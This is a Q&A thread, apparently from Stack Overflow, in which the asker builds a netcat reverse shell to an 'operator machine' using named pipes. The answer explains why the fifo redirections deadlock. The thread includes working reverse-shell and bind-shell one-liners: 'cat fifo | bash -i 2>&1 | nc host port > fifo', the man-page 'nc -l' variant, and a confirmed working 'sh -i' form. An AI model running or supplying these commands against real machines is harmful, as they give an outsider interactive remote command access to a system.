# How to redirect command I/O to nc two-way?

Tags: shell, io, pipe

I am trying to do something like [this](https://stackoverflow.com/a/38830115/3122886) on a POSIX compliance way using `nc`, following the second example given [here](https://stackoverflow.com/a/692407/3122886), it must run on `sh` (can be tested on `dash` or busybox' `ash`, but not on `bash`).

I have done the following:

```sh
# on operator machine
nc -lvp 9999

# on remote machine
out="/tmp/.$$.out"
in="/tmp/.$$.in"
mkfifo "$out" "$in"
trap 'rm "$out" "$in"' EXIT
# nc 192.168.0.10 9999 > "$out" 0< "$in" &
cat "$in" | nc 192.168.0.10 9999 | cat > "$out" &
bash -i > "$in" 2>&1 0< "$out"
```

I have two questions, please, answer both:

1. As you can see I have tried to do `nc 192.168.0.10 9999 > "$out" 0< "$in"` but I do not known why the heck it didn't worked with file redirection, the command freezes, the process isn't even launched, I have tried with pipe on input only and also on output only, but neither way worked. The downside with this `cat` solution is when you exit the command after connected on operator machine it still keeps the process alive on remote machine, requiring to be killed. I want to know why redirection solution didn't work? And how to solve the exit issue? Even though the `cat` solution is not the most elegant one, if it manage to work it would be acceptable.
2. Is there a way to do this two-way I/O redirect using *fd* instead of `mkfifo`? For instance, using `exec 3> dummy`? Remembering it must be POSIX compliance so `>(:)` is unacceptable.

If the *fd* solution is possible, it is not required to make the `mkfifo` solution to work, but I still would be glade to know why the file redirection didn't work.

Answer (score 0, accepted):

You're trying to do a reverse-shell? I can't quite tell from the logic.

A few things about fifos - opening a fifo blocks until *both* sides are opened - i.e. if you open for reading you will get blocked until someone opens it for writing and vice versa.

The reason it won't work with redirection is that the open of the redirection happens in the shell before launching the `nc`, so as a result until a process opens the write-end of the same fifo, it won't be able to open the read-end of the same fifo. In this case you've got a deadly embrace of blocking:

`nc` is blocked opening `"$out"` because nobody's opened it for reading yet.

`bash` is blocked opening `"$in"` because nobody's opened it for writing yet.

You can try rearranging the file descriptor opening order:

```
nc 127.0.0.1 9999 2>&1 > "$out" 0< "$in" &
bash -i 0< "$out" >"$in" 2>&1
```

i.e. we make sure that the opening of `in` and `out` happen in the same order for the commands, which should fix the fifo opening issue.

You don't need to do this with two fifos, you can accomplish it with one using:

```
ncfifo=/tmp/.$$.nc
mkfifo $ncfifo
cat $ncfifo | bash -i 2>&1 | nc 127.0.0.1 9999 >$ncfifo
```

As for (2); I don't know - it's not something I've tried to accomplish myself. The reason for using the fifo is that it allows you to wire up two sides of the pipeline together. I can't see any way of accomplishing this without a fifo, although I'm open to being corrected on this.

The `nc` man page on debian contains the following example, which is for the 'opposite' interpretation:

```
rm -f /tmp/f; mkfifo /tmp/f
cat /tmp/f | /bin/sh -i 2>&1 | nc -l 127.0.0.1 1234 > /tmp/f
```

which is what I've used to do a simpler cat answer; although it seems to work as well omitting the leading cat as:

```
rm -f /tmp/f; mkfifo /tmp/f
/bin/sh -i </tmp/f 2>&1 | nc -l 127.0.0.1 1234 > /tmp/f
```

Comment: You sure is right: `sh -i 2>&1 < "$out" | nc 192.168.0.10 9999 > "$out"` worked properly

Comment: If I want I can accomplish the desirable behaviour by following [this](https://superuser.com/a/633185/457853);